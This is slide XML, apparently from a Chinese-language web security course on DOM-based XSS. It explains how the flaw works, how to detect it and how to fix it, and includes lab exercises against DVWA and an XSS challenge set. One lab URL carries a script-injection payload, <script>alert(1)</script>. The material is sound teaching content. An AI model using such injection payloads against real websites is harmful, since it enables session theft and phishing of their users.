              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>加密信息的破解，导致登录传输存在安全风险。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>结合浏览器及其插件漏洞，下载病毒木马到浏览者的计算机上执行。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>修改页面内容，产生钓鱼攻击效果，例如伪造登录框获取用户明文帐号密码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15745181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DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>式</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>通过本知识域，我们会：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的特点</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>了解什么是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>掌握</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞的触发形式</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的防御</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>掌握</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的检测方法</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>掌握</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞的修复方法</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16999354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DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>式</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的特点</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>此类漏洞也是不存储在服务器里的。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>此类漏洞不需要服务器进行任何解析</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞是利用</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>代码中提取了</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>地址中的部分内容</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>JS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>中下面代码可以提取</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>地址</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>document.location.href</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>只要网站的代码中有这类代码或类似的取</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>内容的代码，就可能会有</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>式的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>触发形式跟反射式</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>类似，也是需要访问页面</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7564179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DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>式</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞的检测与修复方式</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>与之前两类</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞不同的是：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞发生原因跟服务器解析无关，存粹是</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>JS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>代码读取了</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>内容</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>因此检测</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>JS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>代码：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="it-IT" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>document.location</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="it-IT" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>document.URL</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="it-IT" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>document.referrer</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>或其它类似的</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>修复方式主要是</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>JS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>代码过滤</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>写入页面前先</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>转义</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>慎用危险的“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>编写安全的函数方法，从看似“可靠”的数据源获取参数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>值</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="nb-NO" dirty="0"/>
              <a:t>参考</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="nb-NO" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>filter.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="nb-NO" dirty="0"/>
              <a:t>库 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7359206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DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>式</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞实验（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>编写一个简单的链接，弹出</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>192.168.1.64/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/vulnerabilities/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>xss_d</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/?default=English&lt;script&gt;alert(1)&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7671760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DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>式</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞实验（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>编写一个链接，可以提交其它页面的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>数据。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>Vulnerability: Stored Cross Site Scripting (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>XSS)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>页面多一条记录：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>为你自己的名字</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Message</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>为你学的课程名</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16657455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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>实验集合</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本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6059050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a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>1:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>入门</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>要求：注入</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>弹出“</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Hello</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>World</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>！“</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>页面：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>mcir.pte.com</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>xssmh</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/challenges/challenge0.php</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>过滤：无</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>请求：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>GET</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>答案：</a:t>
            </a:r>
            <a:r>
